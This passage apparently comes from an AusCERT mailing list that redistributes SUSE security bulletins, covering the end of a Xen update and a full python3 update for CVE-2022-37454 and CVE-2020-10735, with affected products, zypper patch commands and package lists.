xen-debugsource-4.10.4_40-150000.3.84.1
xen-devel-4.10.4_40-150000.3.84.1
xen-libs-4.10.4_40-150000.3.84.1
xen-libs-debuginfo-4.10.4_40-150000.3.84.1
xen-tools-4.10.4_40-150000.3.84.1
xen-tools-debuginfo-4.10.4_40-150000.3.84.1
xen-tools-domU-4.10.4_40-150000.3.84.1
xen-tools-domU-debuginfo-4.10.4_40-150000.3.84.1
References:
o https://www.suse.com/security/cve/CVE-2021-28689.html
o https://www.suse.com/security/cve/CVE-2022-33746.html
o https://www.suse.com/security/cve/CVE-2022-33748.html
o https://www.suse.com/security/cve/CVE-2022-42309.html
o https://www.suse.com/security/cve/CVE-2022-42310.html
o https://www.suse.com/security/cve/CVE-2022-42311.html
o https://www.suse.com/security/cve/CVE-2022-42312.html
o https://www.suse.com/security/cve/CVE-2022-42313.html
o https://www.suse.com/security/cve/CVE-2022-42314.html
o https://www.suse.com/security/cve/CVE-2022-42315.html
o https://www.suse.com/security/cve/CVE-2022-42316.html
o https://www.suse.com/security/cve/CVE-2022-42317.html
o https://www.suse.com/security/cve/CVE-2022-42318.html
o https://www.suse.com/security/cve/CVE-2022-42319.html
o https://www.suse.com/security/cve/CVE-2022-42320.html
o https://www.suse.com/security/cve/CVE-2022-42321.html
o https://www.suse.com/security/cve/CVE-2022-42322.html
o https://www.suse.com/security/cve/CVE-2022-42323.html
o https://www.suse.com/security/cve/CVE-2022-42325.html
o https://www.suse.com/security/cve/CVE-2022-42326.html
o https://bugzilla.suse.com/1185104
o https://bugzilla.suse.com/1193923
o https://bugzilla.suse.com/1203806
o https://bugzilla.suse.com/1203807
o https://bugzilla.suse.com/1204482
o https://bugzilla.suse.com/1204485
o https://bugzilla.suse.com/1204487
o https://bugzilla.suse.com/1204488
o https://bugzilla.suse.com/1204489
o https://bugzilla.suse.com/1204490
o https://bugzilla.suse.com/1204494
o https://bugzilla.suse.com/1204496
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yG58kNZI30y1K9AQjSuA//QYhWBq1/I1hIngfhZtIXRVdHA1i9KbC2
/V0XzdHRhNjrzJYEilbX/QjVQ5bCXU4A+sidayJ3Fg09dXXpT2BoFakCkgBOdTJV
PwsDWLmt6vmiUTqYfgGmbCkZX70hXBlKwdRJKjBwtMc/XXWv2KdZN2OfffVvOy98
Fi04WETkm6mXwg7q4Ds/RE2JCInNs5ihhbkpIDs1W/8VvDdjFimmE8Z2I6DoCYKH
VZeHq+8MJadjiqa0IMSEtd6ZzSXiqY+vAGPJfyVLIbU+hwxEWBMMEMm51fXFNKOZ
WeLau/U2eEX+y45ge5KVBrtzuN+W8M3nLj13ViDrVrgIXPJHrHpXA5qv6PD/wC5C
+MfvH3y8cRcISVL6Bx2eCUkIXk8DoU6W+4R/BXEbJkxnu594D/Y75rlB8I985rBG
WvkSOfwFnjJMVmkIJnnkLsES1DDkrYrNKaAIZOoRvrUWdZfVlLhc8xVl/jG6sS0J
zhVHUPyFCIYOBU+0jB/Xe0NEPpOopDn3dkZM3FbzytQIhfdWhbCCAFUJdbrnSfqr
U7Wj4Ko+oEQ3I0jssa51202zHNxRblY3N3aLbxd4sx6laZOU+oPClFM+O7N4L4c7
wUtvcQl9WKaCvczan10zSS/fqMT8ykxQno9iAWc1+2XXid27oYqb4BF0ZM7UVm4Q
V0msYdI7k7A=
=W/Ia
-----END PGP SIGNATURE-----
ESB-2022.5780 - [SUSE] python3: CVSS (Max): 8.1
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5780
Security update for python3
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: python3
Publisher: SUSE
Operating System: SUSE
Resolution: Patch/Upgrade
CVE Names: CVE-2022-37454 CVE-2020-10735
Original Bulletin:
https://www.suse.com/support/update/announcement/2022/suse-su-20223924-1
Comment: CVSS (Max): 8.1 CVE-2022-37454 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: SUSE
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
SUSE Security Update: Security update for python3
______________________________________________________________________________
Announcement ID: SUSE-SU-2022:3924-1
Rating: important
References: #1203125 #1204577
Cross-References: CVE-2020-10735 CVE-2022-37454
Affected Products:
SUSE CaaS Platform 4.0
SUSE Enterprise Storage 6
SUSE Enterprise Storage 7
SUSE Linux Enterprise High Performance Computing 15-ESPOS
SUSE Linux Enterprise High Performance Computing 15-LTSS
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS
SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS
SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS
SUSE Linux Enterprise Micro 5.1
SUSE Linux Enterprise Server 15-LTSS
SUSE Linux Enterprise Server 15-SP1-BCL
SUSE Linux Enterprise Server 15-SP1-LTSS
SUSE Linux Enterprise Server 15-SP2-BCL
SUSE Linux Enterprise Server 15-SP2-LTSS
SUSE Linux Enterprise Server for SAP 15
SUSE Linux Enterprise Server for SAP 15-SP1
SUSE Linux Enterprise Server for SAP 15-SP2
SUSE Manager Proxy 4.1
SUSE Manager Retail Branch Server 4.1
SUSE Manager Server 4.1
______________________________________________________________________________
An update that fixes two vulnerabilities is now available.
Description:
This update for python3 fixes the following issues:
o CVE-2022-37454: Fixed a buffer overflow in hashlib.sha3_* implementations.
(bsc#1204577)
o CVE-2020-10735: Fixed a bug to limit amount of digits converting text to
int and vice vera. (bsc#1203125)
Patch Instructions:
To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:
o SUSE Manager Server 4.1:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Server-4.1-2022-3924=1
o SUSE Manager Retail Branch Server 4.1:
zypper in -t patch
SUSE-SLE-Product-SUSE-Manager-Retail-Branch-Server-4.1-2022-3924=1
o SUSE Manager Proxy 4.1:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Proxy-4.1-2022-3924=1
o SUSE Linux Enterprise Server for SAP 15-SP2:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-SP2-2022-3924=1
o SUSE Linux Enterprise Server for SAP 15-SP1:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-SP1-2022-3924=1
o SUSE Linux Enterprise Server for SAP 15:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2022-3924=1
o SUSE Linux Enterprise Server 15-SP2-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP2-LTSS-2022-3924=1
o SUSE Linux Enterprise Server 15-SP2-BCL:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP2-BCL-2022-3924=1
o SUSE Linux Enterprise Server 15-SP1-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP1-LTSS-2022-3924=1
o SUSE Linux Enterprise Server 15-SP1-BCL:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP1-BCL-2022-3924=1
o SUSE Linux Enterprise Server 15-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-2022-3924=1
o SUSE Linux Enterprise Micro 5.1:
zypper in -t patch SUSE-SUSE-MicroOS-5.1-2022-3924=1
o SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP2-LTSS-2022-3924=1
o SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP2-ESPOS-2022-3924=1
o SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP1-LTSS-2022-3924=1
o SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP1-ESPOS-2022-3924=1
o SUSE Linux Enterprise High Performance Computing 15-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2022-3924=1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2022-3924=1
o SUSE Enterprise Storage 7:
zypper in -t patch SUSE-Storage-7-2022-3924=1
o SUSE Enterprise Storage 6:
zypper in -t patch SUSE-Storage-6-2022-3924=1
o SUSE CaaS Platform 4.0:
To install this update, use the SUSE CaaS Platform 'skuba' tool. I will
inform you if it detects new updates and let you then trigger updating of
the complete cluster in a controlled way.
Package List:
o SUSE Manager Server 4.1 (ppc64le s390x x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Manager Retail Branch Server 4.1 (x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Manager Proxy 4.1 (x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server for SAP 15-SP2 (ppc64le x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server for SAP 15-SP1 (ppc64le x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-testsuite-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server for SAP 15 (ppc64le x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server 15-SP2-LTSS (aarch64 ppc64le s390x x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server 15-SP2-BCL (x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server 15-SP1-LTSS (aarch64 ppc64le s390x x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-testsuite-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server 15-SP1-BCL (x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-testsuite-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server 15-LTSS (aarch64 s390x):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Micro 5.1 (aarch64 s390x x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
o SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS (aarch64
x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS (aarch64
x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (aarch64
x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-testsuite-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (aarch64
x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-testsuite-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (aarch64 x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (aarch64 x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Enterprise Storage 7 (aarch64 x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Enterprise Storage 6 (aarch64 x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-testsuite-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE CaaS Platform 4.0 (x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-testsuite-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
References:
o https://www.suse.com/security/cve/CVE-2020-10735.html
o https://www.suse.com/security/cve/CVE-2022-37454.html
o https://bugzilla.suse.com/1203125
o https://bugzilla.suse.com/1204577
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
